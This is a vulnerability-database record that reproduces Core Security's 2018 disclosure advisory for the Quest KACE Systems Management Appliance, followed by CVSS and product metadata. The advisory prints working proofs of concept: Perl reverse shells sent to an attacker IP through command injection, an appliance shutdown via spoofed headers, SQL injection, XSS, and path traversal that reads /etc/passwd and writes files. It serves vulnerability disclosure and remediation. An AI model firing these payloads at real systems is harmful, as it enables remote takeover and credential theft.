Vulnerability from variot - Updated: 2023-12-18 12:01 — The 'reportID' parameter received by the '/common/run_report.php' script in the Quest KACE System Management Appliance 8.0.318 is not sanitized, leading to SQL injection (in particular, an error-based type). Quest KACE System Management Appliance is an IT asset management appliance from Quest Software, USA. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
. Quest KACE System Management Appliance 8.0 (Build 8.0.318) Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. The patch can be downloaded at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7.8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed
. serv: SHA256 hash of a fixed value that depends on each appliance
. orgid: Organization ID
. version: Version number of the agent
The last two parameters are simple to obtain. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
The application uses the Organization ID and Agent version parameters both in an SQL query (see 7.7) and, afterwards, when building an operating system command. This means we need to find a way to append system commands within the Organization ID without breaking the SQL query. If we use the MySQL comment symbol (#), the rest of the value is ignored by the database while still reaching the shell; the ';' that follows it in the payload below then terminates the original command and starts the injected one.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that require higher privileges, the application relies on a message queue (the "Sudo Server") that runs with root privileges and only allows a fixed set of commands to be executed.
One of the available commands allows to change any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] The 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are meant to be accessible only from localhost. This restriction can be bypassed by supplying forged 'Host' and 'X-Forwarded-For' HTTP headers (see the request below): the check evidently relies on these client-controlled values rather than on the actual source address of the connection.
The following proof of concept abuses this vulnerability to shut down the appliance as an anonymous (unauthenticated) user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. SQL injection in download_agent_installer.php
[CVE-2018-11136] The 'orgid' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection. In particular, a blind time based type.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL injection in run_report.php
[CVE-2018-11140] The 'reportId' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross-Site Scripting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to reflected cross-site scripting. The value appears to be echoed into a JavaScript context without encoding: the payload below closes the surrounding string literal and call before injecting alert(1), and comments out the remainder.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'TestContent' (sent base64-encoded as 'VGVzdENvbnRlbnQ=', which matches the 11-byte file in the directory listing further below). Files can be written to any location where the 'www' user has write permissions.
File deletion could be abused to delete the '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence determines whether the appliance setup wizard is shown, so removing it would cause the initial setup wizard to be presented again.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication channel, also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core's reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified Core that the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise Quest would take legal action. 
2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. 
With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0600",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11140"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11140",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-11140",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-15386",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11140",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11140",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-15386",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1214",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-11140",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "VULMON",
"id": "CVE-2018-11140"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 is not sanitized, leading to SQL injection (in particular, an error-based type). QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. 
